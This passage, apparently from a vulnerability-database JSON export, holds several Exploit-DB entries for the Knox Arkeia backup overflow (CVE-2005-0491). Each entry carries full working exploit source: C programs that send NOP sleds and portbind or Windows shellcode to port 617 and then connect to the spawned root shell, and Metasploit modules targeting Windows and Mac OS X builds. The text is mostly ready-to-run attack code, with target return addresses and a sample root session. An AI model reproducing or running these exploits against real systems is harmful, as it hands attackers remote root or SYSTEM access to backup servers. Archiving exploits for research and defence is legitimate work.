progname);\r\n\texit(-1);\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint lin(char *host, char *export, unsigned int tnum)\r\n{\r\n\r\n\tchar \t\thead[] \t\t= \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[DATA_LEN];\r\n\tchar\t\tsc_req[NOP_LEN*2];\r\n\tchar\t\t*sc;\r\n\tunsigned int\tretaddr;\r\n\tunsigned int\tsafe;\r\n\tint\t\tdatalen\t\t= 0;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tint\t\tsock_overflow, 
sock_nops;\r\n\tint \t\ti;\r\n\tint\t\tnullmap = 0;\r\n\r\n\tsock_overflow = sock_nops = 0;\r\n\r\n\tretaddr = targets[tnum].targret;\r\n\tsafe = targets[tnum].targsafe;\r\n\tdatalen = targets[tnum].len;\r\n\r\n\t\r\n\tsock_nops = isock(host, port);\r\n\r\n\tif (sock_nops < 1)\r\n\t\texit(-1);\r\n\tfprintf(stderr, \"[*] Connected to %s:%d NOP+shellcode socket\\n\", host, port);\r\n\r\n\tsock_overflow = isock(host, port);\r\n\tif (sock_overflow < 1)\r\n\t\t\texit(-1);\r\n\tfprintf(stderr, \"[*] Connected to %s:%d overflow socket\\n\", host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, NOP, DATA_LEN);\r\n\r\n\t// copy in return address\r\n\tmemcpy(data+datalen - 8, (char *)&retaddr, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-4, (char *)&safe, 4); \r\n\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, NOP, NOP_LEN+1);\r\n\tsc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);\r\n\tsprintf(sc, \"%s%s%s\", shellcode, export, \"K\");\r\n\tif (strlen(sc) + NOP_LEN > NOP_LEN*2-1) \r\n\t{\r\n\t\tfprintf(stderr, \"[!] 
display name too long\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tmemcpy(sc_req+NOP_LEN, sc, strlen(sc));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+strlen(sc)+1); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow, pointing EIP to above nops+sc\r\n\twrite(sock_overflow, head, HEAD_LEN);\t// 8 byte header\r\n\tdatalen = ntohs(datalen);\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, data, datalen);\t// small overflow packet\r\n\tfprintf(stderr, \"[*] Done, check for xterm\\n\");\r\n\tclose(sock_overflow);\r\n\r\n}\r\n\r\nvoid windows (char *host, int tnum, int offset)\r\n{\r\n\tchar \t\thead[] \t\t= \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[DATA_LEN];\r\n\tchar\t\tsc_req[NOP_LEN*2];\r\n\tchar\t\t*sc;\r\n\tchar\t\t*export;\r\n\tunsigned int\tret;\r\n\tunsigned int\tsafeaddr;\r\n\tint\t\toverflow_len;\r\n\tint\t\tdatasiz\t\t= DATA_LEN;\r\n\tint\t\tdatalen\t\t= 0;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\r\n\tdatalen = targets[tnum].len;\r\n\tret = targets[tnum].targret + offset;\r\n\tsock_overflow = isock(host, port);\r\n\tif (sock_overflow < 1)\r\n\t\t\texit(-1);\r\n\tfprintf(stderr, \"[*] Connected to %s:%d overflow socket\\n\", host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, NOP, DATA_LEN);\r\n\tmemcpy(data+datalen - 4, (char *)&ret, 4);\r\n\tmemcpy(data+DATA_LEN-strlen(shellcode_win)-1, shellcode_win, strlen(shellcode_win));\r\n\t\r\n\t// put size into header\r\n\tdatasiz = ntohs(datasiz);\r\n\tmemcpy(head+6, (char *)&datasiz, 2);\r\n\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\t\t// 8 byte header\r\n\twrite(sock_overflow, data, DATA_LEN);\t\t// large data section\r\n\tclose(sock_overflow);\r\n\r\n\tfor (i = 0; i 
< 20; i++)\r\n\t{\r\n\t\tsleep(1);\t\r\n\t\tfprintf(stderr, \"[*] Attempting to get remote shell, try #%d\\n\", i);\r\n\t\t// connect to shell\r\n\t\tsock_shell = isock(host, SHELL_PORT);\r\n\t\tif (sock_shell > 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\t\t\tgetshell(sock_shell);\r\n\t\t}\r\n\t}\r\n\r\n\tfprintf(stderr, \"[!] Exploit failed or cannot connect to port 80\\n\");\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 77 request */\r\n\t/* last two bytes length */\r\n\tchar\t\t*host;\r\n\tchar\t\t*export;\r\n\tunsigned int\ttnum;\r\n\tint\t\tdatalen\t\t= 0;\r\n\tint\t\toffset\t\t= 0;\r\n\r\n\t\r\n\tif (argc == 4)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\r\n\t\tif (targets[tnum].targtype == LINUX)\r\n\t\t\texport = argv[3];\r\n\t\telse\r\n\t\t\toffset=atoi(argv[3]);\r\n\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\r\n\tfprintf(stderr, \"[*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\\n\");\r\n\tfprintf(stderr, \"[*] Attacking %s system\\n\", targets[tnum].os);\r\n\r\n\tif (targets[tnum].targtype == LINUX )\r\n\t{\r\n\t\tfprintf(stderr, \"[*] Exporting xterm to %s\\n\", export);\r\n\t\tlin(host, export, tnum);\r\n\t}\r\n\telse if (targets[tnum].targtype == WINDOWS)\r\n\t{\r\n\t\tfprintf(stderr, \"[*] Spawning shell on %s:%d\\n\", host, SHELL_PORT);\r\n\t\twindows(host, tnum, offset);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tfprintf(stderr, \"[!] 
Unknown target type: %d\\n\", targets[tnum].targtype);\r\n\t\texit(-1);\r\n\t}\r\n\r\n}\r\n\r\n// milw0rm.com [2005-02-18]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/828/"}, {"lastseen": "2016-01-31T11:43:05", "description": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit. CVE-2005-0491. Remote exploit for linux platform", "published": "2003-09-20T00:00:00", "type": "exploitdb", "title": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2003-09-20T00:00:00", "id": "EDB-ID:102", "href": "https://www.exploit-db.com/exploits/102/", "sourceData": "/*\r\n * Knox Arkiea arkiead local/remote root exploit.\r\n *\r\n * Portbind 5074 shellcode\r\n *\r\n * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.\r\n * \r\n * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.\r\n * A previous request forces a large allocation of NOP's + shellcode in heap\r\n * memory. Find additional targets by searching the heap for NOP's after a \r\n * crash. safeaddr must point to any area of memory that is read/writable\r\n * and won't mess with program/shellcode flow. 
\r\n *\r\n * ./ark_sink host targetnum \r\n * [user@host dir]$ ./ark_sink 192.168.1.2 1\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Sending overflow\r\n * [*] Done\r\n * [*] Sleeping and connecting remote shell\r\n * [*] Connected to 192.168.1.2:5074\r\n * [*] Success, enjoy\r\n * id\r\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n *\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n\r\n#define BUFLEN\t\t10000\t\t/* for getshell() \t\t*/\r\n#define LEN \t\t280\t\t/* overflow packet data section */\r\n#define HEAD_LEN \t8\t\t /* overflow packet header\t*/\r\n#define NOP_LEN\t\t10000\t\t/* nop+shellcode packet \t*/\r\n#define ARK_PORT\t617\r\n#define SHELL_PORT\t5074\r\n#define NOP \t\t0x90\r\n#define NUMTARGS\t2\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080eb940 },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940 },\r\n\tNULL\r\n};\r\n\r\n\r\n/* portbind 5074 */\r\nconst char shellcode[] = 
\r\n\"\\x89\\xc3\\xb0\\x02\\xcd\\x80\\x38\\xc3\\x74\\x05\\x8d\\x43\\x01\\xcd\\x80\"\r\n\"\\x31\\xc0\\x89\\x45\\x10\\x40\\x89\\xc3\\x89\\x45\\x0c\\x40\\x89\\x45\\x08\"\r\n\"\\x8d\\x4d\\x08\\xb0\\x66\\xcd\\x80\\x89\\x45\\x08\\x43\\x66\\x89\\x5d\\x14\"\r\n\"\\x66\\xc7\\x45\\x16\\x13\\xd2\\x31\\xd2\\x89\\x55\\x18\\x8d\\x55\\x14\"\r\n\"\\x89\\x55\\x0c\\xc6\\x45\\x10\\x10\\xb0\\x66\\xcd\\x80\\x40\\x89\\x45\\x0c\"\r\n\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x45\\x0c\\x89\\x45\\x10\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\"\r\n\"\\x75\\xf6\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\r\n\"\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] 
connect\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tfprintf(stderr, \"[*] Connected to %s:%d\\n\", hostname, portnum);\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n./%s hostname target_num\\n\");\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 74 request */\r\n\t/* last two bytes length */\r\n\tchar \t\thead[] = \"\\x00\\x4a\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[512];\r\n\tchar\t\tsc_req[20000];\r\n\tchar\t\t*host;\r\n\tunsigned int\t\ttnum;\r\n\tunsigned int \tsafeaddr;\r\n\tunsigned int \tret;\r\n\tint\t\tdatalen\t\t= LEN;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tunsigned int\taddr\t\t= 0;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\tif (argc == 3)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] 
Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\tret = targets[tnum].targret;\r\n\tsafeaddr = targets[tnum].targsafe;\r\n\r\n\tsock_overflow = sock_nops = sock_shell = 0;\r\n\tsock_nops = isock(host, port);\r\n\tsock_overflow = isock(host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, 0x90, datalen);\r\n\tfor (i = 0; i < datalen; i += 4)\r\n\t\tmemcpy(data+i, (char *)&ret, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-12, (char *)&safeaddr, 4); \r\n\r\n\t// build header of overflow packet\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, 0x90, NOP_LEN+1);\r\n\tmemcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\r\n\twrite(sock_overflow, data, LEN);\r\n\tfprintf(stderr, \"[*] Done\\n\");\r\n\tfprintf(stderr, \"[*] Sleeping and connecting remote shell\\n\");\r\n\tsleep (1);\r\n\tclose(sock_overflow);\r\n\r\n\t// connect to shell\r\n\tsock_shell = isock(host, SHELL_PORT);\r\n\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\tgetshell(sock_shell);\r\n\r\n}\r\n\n\n// milw0rm.com [2003-09-20]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/102/"}, {"lastseen": "2016-02-01T23:55:53", "description": "Arkeia Backup Client Type 77 Overflow (Win32). CVE-2005-0491. 
Remote exploit for win32 platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Arkeia Backup Client Type 77 - Overflow Win32", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16466", "href": "https://www.exploit-db.com/exploits/16466/", "sourceData": "##\r\n# $Id: type77.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Arkeia\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\r\n\t\t\t\tclient for the Windows platform. 
This vulnerability affects\r\n\t\t\t\tall versions up to and including 5.3.3.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0491' ],\r\n\t\t\t\t\t[ 'OSVDB', '14011'],\r\n\t\t\t\t\t[ 'BID', '12594'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # 
ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tinfo = arkeia_info()\r\n\t\tif !(info and info['Version'])\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tprint_status(\"Arkeia Server Information:\")\r\n\t\tinfo.each_pair { |k,v|\r\n\t\t\tprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\r\n\t\t}\r\n\r\n\t\tif (info['System'] !~ /Windows/)\r\n\t\t\tprint_status(\"This module only supports Windows targets\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\tif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\thead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\r\n\t\tdata = (target['Rets'][1] == 5) ? 
prep_ark5() : prep_ark4()\r\n\t\thead[6, 2] = [data.length].pack('n')\r\n\r\n\t\tbegin\r\n\t\t\tsock.put(head)\r\n\t\t\tsock.put(data)\r\n\t\t\tsock.get_once\r\n\t\trescue IOError, EOFError => e\r\n\t\t\tprint_status(\"Exception: #{e.class}:#{e}\")\r\n\t\tend\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\tdef prep_ark5\r\n\t\tdata = rand_text_english(4096, payload_badchars)\r\n\t\tdata[1176, 4] = [target['Rets'][0]].pack('V')\r\n\t\tdata[1172, 2] = \"\\xeb\\xf9\"\r\n\t\tdata[1167, 5] = \"\\xe98\" + [-1172].pack('V')\r\n\t\tdata[0, payload.encoded.length] = payload.encoded\r\n\tend\r\n\r\n\tdef prep_ark4\r\n\t\tdata = rand_text_english(4096, payload_badchars)\r\n\t\tseh = generate_seh_payload( target['Rets'][0] )\r\n\t\tdata[ 96, seh.length] = seh\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16466/"}, {"lastseen": "2016-02-01T11:33:09", "description": "Arkeia Backup Client. CVE-2005-0491. Remote exploit for osx platform", "published": "2005-02-18T00:00:00", "type": "exploitdb", "title": "Arkeia Backup Client <= 5.3.3 - Type 77 Overflow OS X", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2005-02-18T00:00:00", "id": "EDB-ID:9930", "href": "https://www.exploit-db.com/exploits/9930/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Arkeia\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack overflow in the Arkeia backup\r\n\t\t\t\tclient for the Mac OS X platform. This vulnerability affects\r\n\t\t\t\tall versions up to and including 5.3.3 and has been tested\r\n\t\t\t\twith Arkeia 5.3.1 on Mac OS X 10.3.5.\r\n\t\t\t\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0491'],\r\n\t\t\t\t\t[ 'OSVDB', '14011'],\r\n\t\t\t\t\t[ 'BID', '12594'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'MinNops' => 700,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ConnectionType' => '-find',\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Arkeia 5.3.1 Stack Return (boot)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Ret' => 0xbffff910,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\t\r\n\tdef check\r\n\t\tinfo = arkeia_info()\r\n\t\tif !(info and info['Version'])\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\t\t\r\n\t\tprint_status(\"Arkeia Server Information:\")\r\n\t\tinfo.each_pair { |k,v|\r\n\t\t\tprint_status(\" #{k + 
(\" \" * (30-k.length))} = #{v}\")\t\r\n\t\t}\r\n\t\t\r\n\t\tif (info['System'] !~ /Darwin/)\r\n\t\t\tprint_status(\"This module only supports Mac OS X targets\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\t\r\n\t\tif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\t\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\r\n\t\t# Request has to be big enough to find and small enough\r\n\t\t# not to write off the end of the stack. If we write too\r\n\t\t# far down, we also smash env[], which causes a crash in\r\n\t\t# getenv() before our function returns.\r\n\t\t\r\n\t\thead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\r\n\t\thead[6, 2] = [1200].pack('n')\r\n\t\t\r\n\t\tbuf = rand_text_english(1200, payload_badchars)\r\n\r\n\t\t# Return back to the stack either directly or via system lib\r\n\t\tbuf[0, 112] = [target.ret].pack('N') * (112/4)\r\n\r\n\t\t# Huge nop slep followed by the payload\r\n\t\tbuf[112, payload.encoded.length] = payload.encoded\r\n\t\t\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tbegin\r\n\t\t\tsock.put(head)\r\n\t\t\tsock.put(buf)\r\n\t\t\tsock.get_once\t\t\r\n\t\trescue IOError, EOFError => e\r\n\t\t\tprint_status(\"Exception: #{e.class}:#{e}\")\r\n\t\tend\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9930/"}, {"lastseen": "2016-02-02T06:41:53", "description": "Arkeia Backup Client Type 77 Overflow (Mac OS X). CVE-2005-0491. 
Remote exploit for osx platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Arkeia Backup Client Type 77 - Overflow Mac OS X", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16865", "href": "https://www.exploit-db.com/exploits/16865/", "sourceData": "##\r\n# $Id: type77.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude 